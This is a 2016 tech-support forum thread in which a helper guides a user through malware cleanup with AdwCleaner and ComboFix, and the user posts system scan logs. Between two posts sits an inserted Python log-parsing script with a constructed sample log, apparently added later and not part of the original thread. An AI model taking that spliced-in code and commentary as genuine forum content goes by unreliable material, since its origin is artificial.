

Malwarebytes found virus



 
 
Old 12-20-2016, 08:35 PM   #1
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



Hi,
I just did a Malwarebytes scan and it has found 1 trojan and 5 rootkits. There are also 6 or 7 items in the quarantine area with Solvusoft in their name.
I have been having update problems so instead of just removing them I came here just in case there is a connection. I passed an ESET online scan no probs a couple days ago.
win98forever is offline  
 
Old 12-21-2016, 08:19 AM   #2
TSF Enthusiast

techie19- It would be very foolish for me to take the advice you PM'd me. No one should accept help from anyone who cannot post in this thread.
We are meant to only take action recommended by the people who do virus/trojan/spyware help for TSF. Once you post here you should not make any changes to your computer that are not instructed from qualified personnel on here unless you intend to remove the post from this forum.
win98forever is offline  
Old 12-21-2016, 08:54 AM   #3
TSF Enthusiast

I forgot to add this.
The "problem" is that MWB detected several pieces of malware in a scan. I have been having update problems and figured the two might be connected, so I started this thread. I have not removed the detected malware or done anything else since posting. Then I realized/remembered there are other steps for posting here, and now I am adding them here.

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16819 BrowserJavaVersion: 11.111.2
Run by Me at 8:49:47 on 2016-12-21
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1915.952 [GMT -8:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {71A27EC9-3DA6-45FC-60A7-004F623C6189}
SP: Microsoft Security Essentials *Enabled/Updated* {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Windows\system32\svchost.exe -k rpcss
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Windows\RAVCpl64.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Windows\System32\hkcmd.exe
C:\Program Files\TOSHIBA\TOSCDSPD\TOSCDSPD.exe
C:\Windows\ehome\ehtray.exe
C:\Windows\system32\igfxsrvc.exe
C:\Program Files (x86)\Toshiba\ConfigFree\NDSTray.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Toshiba\ConfigFree\CFSwMgr.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
c:\Program Files\Microsoft Security Client\NisSrv.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\svchost.exe -k swprv
C:\Windows\SysWOW64\explorer.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = about:blank
uDefault_Page_URL = hxxp://www.toshibadirect.com/dpdstart
mDefault_Page_URL = hxxp://www.toshibadirect.com/dpdstart
mWinlogon: Userinit = userinit.exe,
BHO: Ghostery Plugin: {6BF739DD-3323-4C6A-975B-C7E00A50B154} - C:\Program Files (x86)\Ghostery\bin\ghostery.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll
uRun: [TOSCDSPD] TOSCDSPD.EXE
uRun: [ehTray.exe] C:\Windows\ehome\ehTray.exe
mRun: [NDSTray.exe] NDSTray.exe
mRun: [jswtrayutil] "C:\Program Files (x86)\Jumpstart\jswtrayutil.exe"
mRun: [cfFncEnabler.exe] cfFncEnabler.exe
mRun: [HP Software Update] C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\MICROS~1.LNK - C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
DPF: {CAFEEFAC-0018-0000-0045-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
TCP: NameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{C12D3495-9B83-4917-A534-5FCF1ED20B86} : DHCPNameServer = 75.75.75.75 75.75.76.76
LSA: Security Packages = kerberos msv1_0 schannel wdigest tspkg
x64-mDefault_Page_URL = hxxp://www.toshibadirect.com/dpdstart
x64-Run: [Windows Defender] C:\Program Files (x86)\Windows Defender\MSASCui.exe -hide
x64-Run: [TPwrMain] C:\Program Files (x86)\TOSHIBA\Power Saver\TPwrMain.EXE
x64-Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
x64-Run: [SmoothView] C:\Program Files (x86)\Toshiba\SmoothView\SmoothView.exe
x64-Run: [Skytel] Skytel.exe
x64-Run: [RtHDVCpl] RAVCpl64.exe
x64-Run: [Persistence] C:\Windows\System32\igfxpers.exe
x64-Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
x64-Run: [IgfxTray] C:\Windows\System32\igfxtray.exe
x64-Run: [HSON] C:\Program Files (x86)\TOSHIBA\TBS\HSON.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [00TCrdMain] C:\Program Files (x86)\TOSHIBA\FlashCards\TCrdMain.exe
x64-mPolicies-Explorer: NoActiveDesktop = dword:1
x64-mPolicies-Explorer: NoActiveDesktopChanges = dword:1
x64-mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
x64-mPolicies-System: EnableUIADesktopToggle = dword:0
x64-Notify: igfxcui - igfxdev.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\
FF - prefs.js: browser.startup.homepage - about:home
FF - prefs.js: network.proxy.type - 0
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_24_0_0_186.dll
.
============= SERVICES / DRIVERS ===============
.
R0 MpFilter;Microsoft Malware Protection Driver;C:\Windows\System32\drivers\MpFilter.sys [2016-8-25 295000]
R0 tos_sps64;TOSHIBA tos_sps64 Service;C:\Windows\System32\drivers\tos_sps64.sys [2015-5-9 504912]
R1 JSWPSLWF;JumpStart Wireless Filter Driver;C:\Windows\System32\drivers\jswpslwfx.sys [2015-5-9 26624]
R2 FontCache;Windows Font Cache Service;C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation [2008-1-20 27648]
R3 FwLnk;FwLnk Driver;C:\Windows\System32\drivers\FwLnk.sys [2008-8-18 8704]
R3 NisDrv;Microsoft Network Inspection System;C:\Windows\System32\drivers\NisDrvWFP.sys [2014-11-15 135928]
R3 NisSrv;Microsoft Network Inspection;C:\Program Files\Microsoft Security Client\NisSrv.exe [2016-8-30 361816]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2016-8-1 103608]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2016-8-1 124088]
S3 PerfHost;Performance Counter DLL Host;C:\Windows\SysWOW64\perfhost.exe [2008-1-20 19968]
S3 PSMounterEx;Macrium Reflect Image Explorer Driver;C:\Windows\System32\drivers\psmounterex.sys [2015-4-2 169992]
S3 PSVolAcc;PSVolAcc;C:\Windows\System32\drivers\PSVolAcc.sys [2014-7-21 12760]
S3 WIMMount;WIMMount;C:\Program Files\Macrium\Reflect\wimmount.sys [2015-5-14 22096]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\WPFFontCache_v0400.exe [2016-8-1 25800]
S4 clr_optimization_v2.0.50727_64;Microsoft .NET Framework NGEN v2.0.50727_X64;C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe [2015-5-10 90776]
S4 ConfigFree Gadget Service;ConfigFree Gadget Service;C:\Program Files (x86)\Toshiba\ConfigFree\CFProcSRVC.exe [2008-4-3 36864]
S4 ConfigFree Service;ConfigFree Service;C:\Program Files (x86)\Toshiba\ConfigFree\CFSvcs.exe [2008-4-16 40960]
S4 jswpsapi;Jumpstart Wifi Protected Setup;C:\Program Files (x86)\Jumpstart\jswpsapi.exe [2015-5-9 954368]
S4 KR10I64;KR10I64;C:\Windows\System32\drivers\KR10I64.sys [2008-8-18 248320]
S4 KR10N64;KR10N64;C:\Windows\System32\drivers\KR10N64.sys [2008-8-18 237568]
S4 ReflectService.exe;Macrium Reflect Image Mounting Service;C:\Program Files\Macrium\Reflect\ReflectService.exe [2014-7-21 3272656]
S4 SmartFaceVWatchSrv;SmartFaceVWatchSrv;C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVWatchSrv.exe [2008-4-24 84992]
S4 TMachInfo;TMachInfo;C:\Program Files (x86)\Toshiba\TOSHIBA Service Station\TMachInfo.exe [2008-8-18 46392]
S4 TOSHIBA SMART Log Service;TOSHIBA SMART Log Service;C:\Program Files\TOSHIBA\SMARTLogService\TosIPCSrv.exe [2007-12-3 175104]
.
=============== File Associations ===============
.
FileExt: .js: JSFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
FileExt: .jse: JSEFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
.
=============== Created Last 30 ================
.
.
==================== Find3M ====================
.
2016-12-21 04:11:36 192216 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2016-12-13 19:04:42 802904 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2016-12-13 19:04:42 144472 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2016-11-02 16:16:24 383208 ----a-w- C:\Windows\System32\atmfd.dll
2016-11-02 16:09:14 48128 ----a-w- C:\Windows\System32\atmlib.dll
2016-11-02 1650 306408 ----a-w- C:\Windows\SysWow64\atmfd.dll
2016-11-02 15:59:25 34304 ----a-w- C:\Windows\SysWow64\atmlib.dll
2016-10-28 01:22:26 485032 ------w- C:\Windows\System32\MpSigStub.exe
2016-10-25 23:10:39 2804736 ----a-w- C:\Windows\System32\win32k.sys
2016-10-19 17:24:56 97856 ----a-w- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
2016-10-04 14:41:48 90112 ----a-w- C:\Windows\System32\drivers\bowser.sys
.
============= FINISH: 8:50:36.86 ===============
Attached file: attach.txt (12.9 KB)
win98forever is offline  
 
Old 12-21-2016, 10:12 PM   #4
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello and Welcome to TSF.

If you haven't already, please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

Please note that these fixes are not instantaneous. Most infections require more than one round to properly eradicate.

Please stay with me until given the 'all clear' even if symptoms seemingly abate.

Kindly follow my instructions and please do no fixing on your own or running of scanners unless requested by a helper.

------------------------------------------------------

If there are any personal files, pics, etc. on your computer you cannot live without, back them up now just as a precaution.

Emergency Backup Procedure - Tech Support Forum

------------------------------------------------------

Please post the MBAM log that reflects 1 trojan and 5 rootkits detected.

------------------------------------------------------

Please download AdwCleaner from here and save it to your desktop.
  • Run AdwCleaner and select Scan
  • Once the Scan is done, select Clean
  • Once done it will ask to reboot, please allow the reboot.
  • On reboot, a log will be produced. It can also be found at C:\AdwCleaner\AdwCleaner[C#].txt
  • Please copy/paste the contents of the log in your next reply.
------------------------------------------------------

Please download ComboFix and Save it to your Desktop.

**Note: It is important that it is saved directly to your desktop**

* Ensure you have disabled all antivirus and antimalware programs so they do not interfere with the running of ComboFix.

Get help here

Double-click ComboFix.exe and follow the prompts to run it.

Your desktop may go blank. This is normal. It will return when ComboFix is done. ComboFix may reboot your machine. This is normal.

When finished, it shall produce a log for you. Please post that log, C:\ComboFix.txt, in your next reply.

Please re-enable your antivirus before posting the ComboFix.txt log.

If you get an 'Illegal operation attempted on a Registry key which has been marked for deletion' error message, please reboot your machine.

------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 12-22-2016, 07:45 AM   #5
TSF Enthusiast

Hello Chemist,
I have no idea why the log does not show the items it told me were detected. Anyway ADWCleaner detected 11 items.

MBAM log
Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 12/20/2016
Scan Time: 8:04:14 PM
Logfile: 12-20-16 MBAM log.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.11.24.10
Rootkit Database: v2016.11.20.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows Vista Service Pack 2
CPU: x64
File System: NTFS
User: Me

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 12
Time Elapsed: 0 min, 38 sec

Memory: Disabled
Startup: Disabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)



Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)



# AdwCleaner v6.041 - Logfile created 22/12/2016 at 07:30:31
# Updated on 16/12/2016 by Malwarebytes
# Database : 2016-12-21.1 [Server]
# Operating System : Windows (TM) Vista Home Premium Service Pack 2 (X64)
# Username : Me - ME-PC
# Running from : C:\Users\Me\Desktop\AdwCleaner.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****



***** [ Folders ] *****

[#] Folder deleted on reboot: C:\Users\Me\AppData\Local\YSearchUtil
[#] Folder deleted on reboot: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\YSearchUtil


***** [ Files ] *****

[-] File deleted: C:\Users\Me\Desktop\SysInfo.exe


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****

[-] Key deleted: HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Solvusoft
[-] Key deleted: HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\DriverDoc_is1
[#] Key deleted on reboot: HKCU\Software\Solvusoft
[-] Key deleted: HKLM\SOFTWARE\Solvusoft
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverDoc_is1
[#] Key deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\DriverDoc_is1
[#] Key deleted on reboot: [x64] HKCU\Software\Solvusoft
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\DriverDoc_is1


***** [ Web browsers ] *****



*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [1685 Bytes] - [22/12/2016 07:30:31]
C:\AdwCleaner\AdwCleaner[S0].txt - [1876 Bytes] - [22/12/2016 07:30:19]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [1831 Bytes] ##########


ComboFix coming
win98forever is offline  
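The MBAM log in the post above reports its scan settings (the Memory/Startup/Rootkits rows), the object count, and a per-category detection count. The following Python script is an added example for this thread, not code from Malwarebytes or from the forum: it parses that log layout and reports which scan components were disabled and what, if anything, was recorded as detected, which is the first thing to check when a scan log does not show the detections the user remembers seeing. The sample log is constructed to mirror the posted one, and the detection-entry layout (one entry per line under a non-zero category, up to the next blank line) is an assumption.

```python
"""Summarise a Malwarebytes Anti-Malware 2.x text log.

Added example; not code from Malwarebytes or from the forum thread.
SAMPLE_LOG is constructed to resemble the log posted in the thread.
"""
import re

# Scan components the log reports as Enabled/Disabled (names taken from the
# posted log; treating exactly these rows as "components" is an assumption).
SCAN_COMPONENTS = ("Memory", "Startup", "Filesystem", "Archives",
                   "Rootkits", "Heuristics", "PUP", "PUM")

# Categories that carry a detection count.
DETECTION_CATEGORIES = ("Processes", "Modules", "Registry Keys",
                        "Registry Values", "Registry Data", "Folders",
                        "Files", "Physical Sectors")

# Constructed sample log; paths and detection names are placeholders.
SAMPLE_LOG = r"""Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 12/20/2016
Scan Time: 8:04:14 PM
Administrator: Yes

Version: 2.2.1.1043
License: Free
Malware Protection: Disabled

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 12
Time Elapsed: 0 min, 38 sec

Memory: Disabled
Startup: Disabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Files: 2
Trojan.Agent.Sample, C:\Users\Me\AppData\Local\Temp\constructed-sample.exe, Quarantined, [constructed-id],
PUP.Optional.Sample, C:\Users\Me\Downloads\constructed-sample-2.exe, Quarantined, [constructed-id],

Physical Sectors: 0
(No malicious items detected)

(end)
"""

# "Key: Value" header lines; the non-greedy key stops at the first colon, so
# "Scan Time: 8:04:14 PM" yields key "Scan Time" and value "8:04:14 PM".
HEADER_RE = re.compile(r"^([A-Za-z][A-Za-z ]*?):\s*(.*)$")
COUNT_RE = re.compile(r"^([A-Za-z ]+): (\d+)$")


def parse_fields(log_text):
    """Return a dict of every 'Key: Value' line in the log."""
    fields = {}
    for line in log_text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def disabled_components(fields):
    """Scan components the log marks as Disabled, in log order."""
    return [c for c in SCAN_COMPONENTS if fields.get(c, "").lower() == "disabled"]


def detection_counts(fields):
    """Per-category detection counts that appear in the log."""
    return {c: int(fields[c]) for c in DETECTION_CATEGORIES
            if c in fields and fields[c].isdigit()}


def detections(log_text):
    """(category, entry) pairs listed under categories with a non-zero count.

    Assumption: entries follow the 'Category: N' line, one per line, until
    the next blank line.
    """
    found = []
    lines = log_text.splitlines()
    i = 0
    while i < len(lines):
        m = COUNT_RE.match(lines[i])
        i += 1
        if m and m.group(1) in DETECTION_CATEGORIES and int(m.group(2)) > 0:
            while i < len(lines) and lines[i].strip():
                found.append((m.group(1), lines[i].strip()))
                i += 1
    return found


def summarize(log_text):
    """Everything a helper would want to know before trusting the scan."""
    fields = parse_fields(log_text)
    return {
        "objects_scanned": int(fields.get("Objects Scanned", "0")),
        "disabled": disabled_components(fields),
        "counts": detection_counts(fields),
        "detections": detections(log_text),
    }


if __name__ == "__main__":
    summary = summarize(SAMPLE_LOG)
    print("objects scanned:", summary["objects_scanned"])
    print("disabled scan components:", ", ".join(summary["disabled"]) or "none")
    for category, entry in summary["detections"]:
        print(f"{category}: {entry}")
```

Run against the posted log, the useful signals are a very small "Objects Scanned" value combined with several disabled components, which together explain why a log can be nearly empty even though an earlier, more complete scan reported detections.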
Old 12-22-2016, 08:07 AM   #6
TSF Enthusiast

Here is the ComboFix log.
NOTE: When ComboFix was done the computer alerted me to check my malware protection, as I had disabled real-time protection in MSE. I clicked and then chose turn it on, and when I looked at the settings real-time protection was not disabled? And I noticed in history that there is a malware in all detected items named "Rogue:JS/TechBrolo.E" and it recommends removal. Should I do this or wait?

ComboFix 16-12-15.01 - Me 12/22/2016 7:48.1.2 - x64
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1915.417 [GMT -8:00]
Running from: c:\users\Me\Desktop\ComboFix.exe
AV: Microsoft Security Essentials *Disabled/Updated* {71A27EC9-3DA6-45FC-60A7-004F623C6189}
SP: Microsoft Security Essentials *Disabled/Updated* {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((( Files Created from 2016-11-22 to 2016-12-22 )))))))))))))))))))))))))))))))
.
.
2016-12-22 15:56 . 2016-12-22 15:57 -------- d-----w- c:\users\Me\AppData\Local\temp
2016-12-22 15:56 . 2016-12-22 15:56 -------- d-----w- c:\users\Default\AppData\Local\temp
2016-12-21 16:48 . 2016-11-10 07:44 11781064 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{DE35367E-C6C0-418F-A120-0F38F93712D0}\mpengine.dll
2016-12-18 23:52 . 2016-12-18 23:52 -------- d-----w- c:\windows\CheckSur
2016-12-18 23:44 . 2016-11-10 07:44 11781064 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2016-12-18 20:16 . 2016-12-18 20:16 -------- d-----w- C:\65c7b20dc424bda6bd39db516b4d
2016-12-18 17:45 . 2016-12-18 17:45 -------- d-----w- C:\2b654b41d190c0d9a397eb33
2016-12-11 16:12 . 2016-05-11 21:23 1167568 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{BD06FC61-98E6-414B-9838-1B00DE9903B8}\gapaengine.dll
2016-11-24 22:24 . 2016-10-25 23:10 2804736 ----a-w- c:\windows\system32\win32k.sys
2016-11-24 22:19 . 2016-11-02 16:16 383208 ----a-w- c:\windows\system32\atmfd.dll
2016-11-24 22:19 . 2016-11-02 16:09 48128 ----a-w- c:\windows\system32\atmlib.dll
2016-11-24 22:19 . 2016-11-02 15:59 34304 ----a-w- c:\windows\SysWow64\atmlib.dll
2016-11-24 22:19 . 2016-11-02 16:06 306408 ----a-w- c:\windows\SysWow64\atmfd.dll
2016-11-24 22:05 . 2016-11-24 22:05 -------- d-----w- C:\03a9f024af5b29727cd1e2a8
2016-11-24 21:37 . 2016-10-04 14:41 90112 ----a-w- c:\windows\system32\drivers\bowser.sys
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2016-12-22 15:37 . 2015-07-09 14:57 192216 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2016-12-13 19:04 . 2016-05-06 20:01 802904 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2016-12-13 19:04 . 2016-05-06 20:01 144472 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2016-10-28 01:22 . 2015-05-10 16:11 485032 ------w- c:\windows\system32\MpSigStub.exe
2016-10-19 17:24 . 2015-05-10 17:05 97856 ----a-w- c:\windows\SysWow64\WindowsAccessBridge-32.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 138240]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"NDSTray.exe"="NDSTray.exe" [BU]
"SunJavaUpdateSched"="c:\program files (x86)\Common Files\Java\Java Update\jusched.exe" [2016-09-23 587288]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Microsoft Office.lnk - c:\program files (x86)\Microsoft Office\Office\OSA9.EXE -b -l [2000-1-21 65588]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WudfSvc]
@="Service"
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\svchost]
hpdevmgmt REG_MULTI_SZ hpqcxs08
.
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Svchost - NetSvcs
Themes
.
Contents of the 'Scheduled Tasks' folder
.
2016-12-22 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-05-06 19:04]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2008-08-14 1573160]
"Skytel"="Skytel.exe" [2007-11-21 1826816]
"RtHDVCpl"="RAVCpl64.exe" [2008-04-08 6156288]
"Persistence"="c:\windows\system32\igfxpers.exe" [2008-06-25 181784]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2016-08-30 1354712]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2008-06-25 151064]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2008-06-25 209432]
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = about:blank
mDefault_Page_URL = hxxp://www.toshibadirect.com/dpdstart
mLocal Page = c:\windows\SysWOW64\blank.htm
TCP: DhcpNameServer = 75.75.75.75 75.75.76.76
FF - ProfilePath - c:\users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\
FF - prefs.js: browser.startup.homepage - about:home
FF - prefs.js: network.proxy.type - 0
.
- - - - ORPHANS REMOVED - - - -
.
Wow6432Node-HKCU-Run-TOSCDSPD - TOSCDSPD.EXE
Wow6432Node-HKLM-Run-jswtrayutil - c:\program files (x86)\Jumpstart\jswtrayutil.exe
Wow6432Node-HKLM-Run-cfFncEnabler.exe - cfFncEnabler.exe
Wow6432Node-HKLM-Run-HP Software Update - c:\program files (x86)\HP\HP Software Update\HPWuSchd2.exe
SafeBoot-WudfPf
SafeBoot-WudfRd
HKLM-Run-TPwrMain - c:\program files (x86)\TOSHIBA\Power Saver\TPwrMain.EXE
HKLM-Run-SmoothView - c:\program files (x86)\Toshiba\SmoothView\SmoothView.exe
HKLM-Run-HSON - c:\program files (x86)\TOSHIBA\TBS\HSON.exe
HKLM-Run-00TCrdMain - c:\program files (x86)\TOSHIBA\FlashCards\TCrdMain.exe
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Environment*]
"v5Licence0"="15-8DXB-2BGY-5315-9J2D-PQRG-DU44U6D"
"Activated"="Y"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes]
"SymbolicLinkValue"=hex(6):5c,00,52,00,45,00,47,00,49,00,53,00,54,00,52,00,59,
00,5c,00,4d,00,41,00,43,00,48,00,49,00,4e,00,45,00,5c,00,53,00,4f,00,46,00,\
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
